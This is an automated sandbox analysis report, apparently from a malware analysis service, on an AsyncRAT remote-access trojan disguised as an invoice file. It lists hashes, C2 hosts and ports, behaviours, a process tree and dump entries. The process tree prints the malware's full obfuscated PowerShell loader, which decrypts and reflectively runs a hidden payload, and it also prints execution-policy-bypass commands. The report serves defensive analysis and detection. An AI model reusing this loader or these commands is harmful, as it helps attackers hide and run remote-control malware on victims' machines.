asyncrat | c4faab169180f07a3621c37d42aa79d04825b2a2ecc2ba01b3db7d1a8950c8b6

Analysis

max time kernel
402s
max time network
1218s
platform
windows10-1703_x64
resource
win10-20220812-en
resource tags

arch:x64arch:x86image:win10-20220812-enlocale:en-usos:windows10-1703-x64system
submitted
09-02-2023 14:59

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Invoice due.one.exe
Size

153KB
MD5

6de66d63e7e9a414313c0237cbe97e78
SHA1

464b5449e668281565e3378c72063431be99c15f
SHA256

c4faab169180f07a3621c37d42aa79d04825b2a2ecc2ba01b3db7d1a8950c8b6
SHA512

cc2ecad9bcee75e79c812564afadee4bfe3445b72818d13ff92b732326e222699b3d803728742a0ddc64adc7405eae3d365abb6371f62a921589ab82075930c0
SSDEEP

3072:f0FHdppuOf+wMSHjnywM0vY9t8Qkh+n8KMmkYX3HB8ox1wm/:cFPMOf+wMAywM0EJksnJvNHh8Sn/

Score

10^/10

asyncrat default rat

Malware Config

Extracted

Family

asyncrat

Version

0.5.7B

Botnet

Default

mulla1.mywire.org:6606

mulla1.mywire.org:7707

mulla1.mywire.org:8808

mulla2022.hopto.org:6606

mulla2022.hopto.org:7707

mulla2022.hopto.org:8808

mulla2.mywire.org:6606

mulla2.mywire.org:7707

mulla2.mywire.org:8808

Mutex

Gallery

Attributes

delay
3
install
false
install_folder
%AppData%

aes.plain

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers.
rat asyncrat

Async RAT payload 2 IoCs

rat

Processes:

resource	yara_rule
behavioral1/memory/4276-286-0x0000000008D80000-0x0000000008D92000-memory.dmp	asyncrat
behavioral1/memory/4276-313-0x0000000008DC0000-0x0000000008DE2000-memory.dmp	asyncrat

Executes dropped EXE 1 IoCs

Processes:

Attached file.bat.exe

pid process

4276 Attached file.bat.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Delays execution with timeout.exe 1 IoCs
evasion

Processes:

timeout.exe

pid process

4540 timeout.exe
Suspicious behavior: EnumeratesProcesses 3 IoCs

Processes:

Attached file.bat.exe

pid process

4276 Attached file.bat.exe
4276 Attached file.bat.exe
4276 Attached file.bat.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

Attached file.bat.exe

description pid process

Token: SeDebugPrivilege 4276 Attached file.bat.exe

pid	process
4276	Attached file.bat.exe

pid	process
4540	timeout.exe

pid	process
4276	Attached file.bat.exe
4276	Attached file.bat.exe
4276	Attached file.bat.exe

description	pid	process
Token: SeDebugPrivilege	4276	Attached file.bat.exe

Suspicious use of WriteProcessMemory 18 IoCs

Processes:

Invoice due.one.execmd.exeAttached file.bat.execmd.execmd.exe

description	pid	process	target process
PID 2448 wrote to memory of 1348	2448	Invoice due.one.exe	cmd.exe
PID 2448 wrote to memory of 1348	2448	Invoice due.one.exe	cmd.exe
PID 2448 wrote to memory of 1348	2448	Invoice due.one.exe	cmd.exe
PID 1348 wrote to memory of 4276	1348	cmd.exe	Attached file.bat.exe
PID 1348 wrote to memory of 4276	1348	cmd.exe	Attached file.bat.exe
PID 1348 wrote to memory of 4276	1348	cmd.exe	Attached file.bat.exe
PID 4276 wrote to memory of 4504	4276	Attached file.bat.exe	cmd.exe
PID 4276 wrote to memory of 4504	4276	Attached file.bat.exe	cmd.exe
PID 4276 wrote to memory of 4504	4276	Attached file.bat.exe	cmd.exe
PID 4276 wrote to memory of 4572	4276	Attached file.bat.exe	cmd.exe
PID 4276 wrote to memory of 4572	4276	Attached file.bat.exe	cmd.exe
PID 4276 wrote to memory of 4572	4276	Attached file.bat.exe	cmd.exe
PID 4504 wrote to memory of 4332	4504	cmd.exe	powershell.exe
PID 4504 wrote to memory of 4332	4504	cmd.exe	powershell.exe
PID 4504 wrote to memory of 4332	4504	cmd.exe	powershell.exe
PID 4572 wrote to memory of 4540	4572	cmd.exe	timeout.exe
PID 4572 wrote to memory of 4540	4572	cmd.exe	timeout.exe
PID 4572 wrote to memory of 4540	4572	cmd.exe	timeout.exe

C:\Users\Admin\AppData\Local\Temp\Invoice due.one.exe
"C:\Users\Admin\AppData\Local\Temp\Invoice due.one.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2448

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7zSA9F1.tmp\Attached file.bat" "
2⤵
- Suspicious use of WriteProcessMemory
PID:1348

C:\Users\Admin\AppData\Local\Temp\7zSA9F1.tmp\Attached file.bat.exe
"Attached file.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $ttXwr = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\7zSA9F1.tmp\Attached file.bat').Split([Environment]::NewLine);foreach ($IwcZR in $ttXwr) { if ($IwcZR.StartsWith(':: ')) { $jwYjz = $IwcZR.Substring(3); break; }; };$DRyrf = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($jwYjz);$jeXlp = New-Object System.Security.Cryptography.AesManaged;$jeXlp.Mode = [System.Security.Cryptography.CipherMode]::CBC;$jeXlp.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$jeXlp.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('CedaivH7c2Og4h7rOIX15KINYZFZWQdVk+kZhiAR7Dg=');$jeXlp.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ND6uaRHwvfNQY4EWCZjXCg==');$GxqNz = $jeXlp.CreateDecryptor();$DRyrf = $GxqNz.TransformFinalBlock($DRyrf, 0, $DRyrf.Length);$GxqNz.Dispose();$jeXlp.Dispose();$fIBwg = New-Object System.IO.MemoryStream(, $DRyrf);$MaiTM = New-Object System.IO.MemoryStream;$DTruH = New-Object System.IO.Compression.GZipStream($fIBwg, [IO.Compression.CompressionMode]::Decompress);$DTruH.CopyTo($MaiTM);$DTruH.Dispose();$fIBwg.Dispose();$MaiTM.Dispose();$DRyrf = $MaiTM.ToArray();$WLnCz = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($DRyrf);$vfzgA = $WLnCz.EntryPoint;$vfzgA.Invoke($null, (, [string[]] ('')))
3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4276

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c start /b powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\zwngvx.bat"' & exit
4⤵
- Suspicious use of WriteProcessMemory
PID:4504

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\zwngvx.bat"'
5⤵
PID:4332

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp956.tmp.bat""
4⤵
- Suspicious use of WriteProcessMemory
PID:4572

C:\Windows\SysWOW64\timeout.exe
timeout 2
5⤵
- Delays execution with timeout.exe
PID:4540

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\7zSA9F1.tmp\Attached file.bat
Filesize
49KB

MD5
28083371df55e64f12c86dccc6f69f55

SHA1
2cc63c7389063aab8fb19609f8a21e038c783eab

SHA256
1d2b7d4335fdf27119f1db76fb7685d75dacfc0427c300f83bcbbabeb8622529

SHA512
d11fe0d09aada3b069125a075cb9da249c1b30fd4489c912c1563aeff8b846c1e0f2f11cd18c81888d3e731f2331abd4ce2d5d1e4de79246ae3a8004be7a98a3

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zSA9F1.tmp\Attached file.bat.exe
Filesize
420KB

MD5
be8ffebe1c4b5e18a56101a3c0604ea0

SHA1
2ec8af7c1538974d64291845dcb02111b907770f

SHA256
d2434e607451a4d29d28f43a529246dc81d25a2fae9c271e28c55452c09a28a5

SHA512
71008aa20932c8ecf48582d3b9678ba184e99d482daec9287a124f20af7184f1b02f800e2bdc83f6eb45832af6fdce88bfaf0e3398c617812969d0d27750fdeb

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zSA9F1.tmp\Attached file.bat.exe
Filesize
420KB

MD5
be8ffebe1c4b5e18a56101a3c0604ea0

SHA1
2ec8af7c1538974d64291845dcb02111b907770f

SHA256
d2434e607451a4d29d28f43a529246dc81d25a2fae9c271e28c55452c09a28a5

SHA512
71008aa20932c8ecf48582d3b9678ba184e99d482daec9287a124f20af7184f1b02f800e2bdc83f6eb45832af6fdce88bfaf0e3398c617812969d0d27750fdeb

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp956.tmp.bat
Filesize
180B

MD5
04799e259ea30040ed86772bc628139e

SHA1
4203371333ec94b3a2ec2b5a510ac5bc8a7f39f0

SHA256
761d2ddb605269ac3722e52637e303f36aa573c9c27250fd7036893a56b60746

SHA512
563fc771c5c7ebee504e9247d7470689709cb1db8d506cd0b59113c7305ba028cee424ff885e0f24198d4a4ddb7dd45f0456441c7b51ec985a37a6d27d18b59f

Download Submit
memory/1348-175-0x0000000000000000-mapping.dmp

Download
memory/1348-182-0x0000000077830000-0x00000000779BE000-memory.dmp

Filesize
1.6MB

Download
memory/1348-181-0x0000000077830000-0x00000000779BE000-memory.dmp

Filesize
1.6MB

Download
memory/1348-180-0x0000000077830000-0x00000000779BE000-memory.dmp

Filesize
1.6MB

Download
memory/1348-178-0x0000000077830000-0x00000000779BE000-memory.dmp

Filesize
1.6MB

Download
memory/1348-179-0x0000000077830000-0x00000000779BE000-memory.dmp

Filesize
1.6MB

Download
memory/1348-177-0x0000000077830000-0x00000000779BE000-memory.dmp

Filesize
1.6MB

Download
memory/1348-176-0x0000000077830000-0x00000000779BE000-memory.dmp

Filesize
1.6MB

Download
memory/2448-140-0x0000000077830000-0x00000000779BE000-memory.dmp

Filesize
1.6MB

Download
memory/2448-169-0x0000000077830000-0x00000000779BE000-memory.dmp

Filesize
1.6MB

Download
memory/2448-132-0x0000000077830000-0x00000000779BE000-memory.dmp

Filesize
1.6MB

Download
memory/2448-133-0x0000000077830000-0x00000000779BE000-memory.dmp

Filesize
1.6MB

Download
memory/2448-134-0x0000000077830000-0x00000000779BE000-memory.dmp

Filesize
1.6MB

Download
memory/2448-135-0x0000000077830000-0x00000000779BE000-memory.dmp

Filesize
1.6MB

Download
memory/2448-137-0x0000000077830000-0x00000000779BE000-memory.dmp

Filesize
1.6MB

Download
memory/2448-138-0x0000000077830000-0x00000000779BE000-memory.dmp

Filesize
1.6MB

Download
memory/2448-136-0x0000000077830000-0x00000000779BE000-memory.dmp

Filesize
1.6MB

Download
memory/2448-139-0x0000000077830000-0x00000000779BE000-memory.dmp

Filesize
1.6MB

Download
memory/2448-118-0x0000000077830000-0x00000000779BE000-memory.dmp

Filesize
1.6MB

Download
memory/2448-141-0x0000000077830000-0x00000000779BE000-memory.dmp

Filesize
1.6MB

Download
memory/2448-142-0x0000000077830000-0x00000000779BE000-memory.dmp

Filesize
1.6MB

Download
memory/2448-143-0x0000000077830000-0x00000000779BE000-memory.dmp

Filesize
1.6MB

Download
memory/2448-145-0x0000000077830000-0x00000000779BE000-memory.dmp

Filesize
1.6MB

Download
memory/2448-144-0x0000000077830000-0x00000000779BE000-memory.dmp

Filesize
1.6MB

Download
memory/2448-146-0x0000000077830000-0x00000000779BE000-memory.dmp

Filesize
1.6MB

Download
memory/2448-147-0x0000000077830000-0x00000000779BE000-memory.dmp

Filesize
1.6MB

Download
memory/2448-149-0x0000000077830000-0x00000000779BE000-memory.dmp

Filesize
1.6MB

Download
memory/2448-148-0x0000000077830000-0x00000000779BE000-memory.dmp

Filesize
1.6MB

Download
memory/2448-150-0x0000000077830000-0x00000000779BE000-memory.dmp

Filesize
1.6MB

Download
memory/2448-151-0x0000000077830000-0x00000000779BE000-memory.dmp

Filesize
1.6MB

Download
memory/2448-152-0x0000000077830000-0x00000000779BE000-memory.dmp

Filesize
1.6MB

Download
memory/2448-153-0x0000000077830000-0x00000000779BE000-memory.dmp

Filesize
1.6MB

Download
memory/2448-154-0x0000000077830000-0x00000000779BE000-memory.dmp

Filesize
1.6MB

Download
memory/2448-156-0x0000000077830000-0x00000000779BE000-memory.dmp

Filesize
1.6MB

Download
memory/2448-155-0x0000000077830000-0x00000000779BE000-memory.dmp

Filesize
1.6MB

Download
memory/2448-157-0x0000000077830000-0x00000000779BE000-memory.dmp

Filesize
1.6MB

Download
memory/2448-158-0x0000000077830000-0x00000000779BE000-memory.dmp

Filesize
1.6MB

Download
memory/2448-159-0x0000000077830000-0x00000000779BE000-memory.dmp

Filesize
1.6MB

Download
memory/2448-160-0x0000000077830000-0x00000000779BE000-memory.dmp

Filesize
1.6MB

Download
memory/2448-161-0x0000000077830000-0x00000000779BE000-memory.dmp

Filesize
1.6MB

Download
memory/2448-162-0x0000000077830000-0x00000000779BE000-memory.dmp

Filesize
1.6MB

Download
memory/2448-163-0x0000000077830000-0x00000000779BE000-memory.dmp

Filesize
1.6MB

Download
memory/2448-164-0x0000000077830000-0x00000000779BE000-memory.dmp

Filesize
1.6MB

Download
memory/2448-165-0x0000000077830000-0x00000000779BE000-memory.dmp

Filesize
1.6MB

Download
memory/2448-166-0x0000000077830000-0x00000000779BE000-memory.dmp

Filesize
1.6MB

Download
memory/2448-167-0x0000000077830000-0x00000000779BE000-memory.dmp

Filesize
1.6MB

Download
memory/2448-168-0x0000000077830000-0x00000000779BE000-memory.dmp

Filesize
1.6MB

Download
memory/2448-131-0x0000000077830000-0x00000000779BE000-memory.dmp

Filesize
1.6MB

Download
memory/2448-170-0x0000000077830000-0x00000000779BE000-memory.dmp

Filesize
1.6MB

Download
memory/2448-171-0x0000000077830000-0x00000000779BE000-memory.dmp

Filesize
1.6MB

Download
memory/2448-172-0x0000000077830000-0x00000000779BE000-memory.dmp

Filesize
1.6MB

Download
memory/2448-173-0x0000000077830000-0x00000000779BE000-memory.dmp

Filesize
1.6MB

Download
memory/2448-174-0x0000000077830000-0x00000000779BE000-memory.dmp

Filesize
1.6MB

Download
memory/2448-130-0x0000000077830000-0x00000000779BE000-memory.dmp

Filesize
1.6MB

Download
memory/2448-129-0x0000000077830000-0x00000000779BE000-memory.dmp

Filesize
1.6MB

Download
memory/2448-128-0x0000000077830000-0x00000000779BE000-memory.dmp

Filesize
1.6MB

Download
memory/2448-127-0x0000000077830000-0x00000000779BE000-memory.dmp

Filesize
1.6MB

Download
memory/2448-126-0x0000000077830000-0x00000000779BE000-memory.dmp

Filesize
1.6MB

Download
memory/2448-125-0x0000000077830000-0x00000000779BE000-memory.dmp

Filesize
1.6MB

Download
memory/2448-124-0x0000000077830000-0x00000000779BE000-memory.dmp

Filesize
1.6MB

Download
memory/2448-123-0x0000000077830000-0x00000000779BE000-memory.dmp

Filesize
1.6MB

Download
memory/2448-122-0x0000000077830000-0x00000000779BE000-memory.dmp

Filesize
1.6MB

Download
memory/2448-119-0x0000000077830000-0x00000000779BE000-memory.dmp

Filesize
1.6MB

Download
memory/2448-121-0x0000000077830000-0x00000000779BE000-memory.dmp

Filesize
1.6MB

Download
memory/2448-120-0x0000000077830000-0x00000000779BE000-memory.dmp

Filesize
1.6MB

Download
memory/4276-278-0x0000000008CB0000-0x0000000008CBE000-memory.dmp

Filesize
56KB

Download
memory/4276-253-0x0000000006DF0000-0x0000000006E56000-memory.dmp

Filesize
408KB

Download
memory/4276-228-0x0000000004590000-0x00000000045C6000-memory.dmp

Filesize
216KB

Download
memory/4276-254-0x00000000074A0000-0x0000000007506000-memory.dmp

Filesize
408KB

Download
memory/4276-255-0x0000000007510000-0x0000000007860000-memory.dmp

Filesize
3.3MB

Download
memory/4276-261-0x0000000006C60000-0x0000000006C7C000-memory.dmp

Filesize
112KB

Download
memory/4276-262-0x0000000007E30000-0x0000000007E7B000-memory.dmp

Filesize
300KB

Download
memory/4276-265-0x0000000007B90000-0x0000000007C06000-memory.dmp

Filesize
472KB

Download
memory/4276-286-0x0000000008D80000-0x0000000008D92000-memory.dmp

Filesize
72KB

Download
memory/4276-277-0x0000000008A70000-0x0000000008A8A000-memory.dmp

Filesize
104KB

Download
memory/4276-233-0x0000000006E70000-0x0000000007498000-memory.dmp

Filesize
6.2MB

Download
memory/4276-251-0x0000000006B70000-0x0000000006B92000-memory.dmp

Filesize
136KB

Download
memory/4276-276-0x0000000009320000-0x0000000009998000-memory.dmp

Filesize
6.5MB

Download
memory/4276-310-0x00000000090C0000-0x000000000915C000-memory.dmp

Filesize
624KB

Download
memory/4276-311-0x0000000009EA0000-0x000000000A39E000-memory.dmp

Filesize
5.0MB

Download
memory/4276-313-0x0000000008DC0000-0x0000000008DE2000-memory.dmp

Filesize
136KB

Download
memory/4276-314-0x0000000009020000-0x000000000903E000-memory.dmp

Filesize
120KB

Download
memory/4276-191-0x0000000000000000-mapping.dmp

Download
memory/4332-342-0x0000000000000000-mapping.dmp

Download
memory/4504-327-0x0000000000000000-mapping.dmp

Download
memory/4540-358-0x0000000000000000-mapping.dmp

Download
memory/4572-333-0x0000000000000000-mapping.dmp

Download